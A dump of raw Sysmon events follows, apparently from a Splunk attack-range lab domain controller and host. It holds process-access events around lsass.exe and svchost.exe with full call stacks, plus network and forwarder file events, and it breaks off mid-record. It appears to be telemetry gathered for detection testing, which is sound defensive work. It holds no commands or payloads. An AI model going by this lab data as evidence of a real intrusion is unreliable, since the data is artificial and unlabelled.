12:31:11.042{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\kerberos.DLL+97b62|C:\Windows\system32\kerberos.DLL+79e38|C:\Windows\system32\kerberos.DLL+144ff|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+2d8f6|C:\Windows\system32\lsasrv.dll+32ce5|C:\Windows\system32\lsasrv.dll+30b6b|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+17a7d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x800000000000000048637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.042{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.995{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.995{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.995{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.995{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.995{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.995{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.995{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.995{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.995{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.995{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.995{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000018996Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:10.968{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50204-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018995Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:12.159{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8F833A8D06A0CDDEB479AB11269CE93,SHA256=5FCD1AC0E958872ED93700A8CBECE14F002C715FE846BB6CB3FB50C89BE1B2F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:12.383{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCD88E9A4E2BA68DCBA42592C7AC9B06,SHA256=8E0DD9B9164745C702FD166369AE02403F7F5B5240BBCB7E68DD50928C6A2A26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000048682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.519{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56518-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 354300x800000000000000048681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.519{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56518-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 354300x800000000000000048680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.516{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56517-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local47001- 354300x800000000000000048679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.516{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56517-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local47001- 10341000x800000000000000048678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:12.143{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000048677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:12.089{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=359A1CBB9E9302B7ACF6CCDE6979FA6C,SHA256=551AC85281EC73A8CC52DEF7B9511769C99964351CCBEC228BEC5F01387771D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:12.046{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C2B507214266CE3CCED84F4368D207BE,SHA256=EB10B4D419BE7673CA9738F290613E3569DF728576F4EF314FE84AD3B0CF467E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018997Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:13.261{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C45EF93B7840F542FAF3B8379E9B6F62,SHA256=5C289741C24DE6997AC11E6DFB378AFA1524DAA8BB77B4C3F8D2E06FEC0B8689,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:11.198{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59487- 354300x800000000000000048688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.750{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56520-false34.104.35.123-80http 23542300x800000000000000048687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:13.298{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E0257C6DCFA626875A4DB3282884370,SHA256=8EBC63CEE9B44395019B32458C554C1BC25AA60060AA120AED914C4EAE28F870,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000048686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.737{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63913- 354300x800000000000000048685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.586{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56519-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local47001- 354300x800000000000000048684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:10.586{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56519-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local47001- 23542300x800000000000000018998Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:14.349{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83E6B60E0BF16D6B43AD01DEC77635A0,SHA256=B2F6A4968D3479FDFE41948A9A67505D4C220C1DD3F609B51CD80C221962CC52,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000048716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.820{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.818{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.811{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 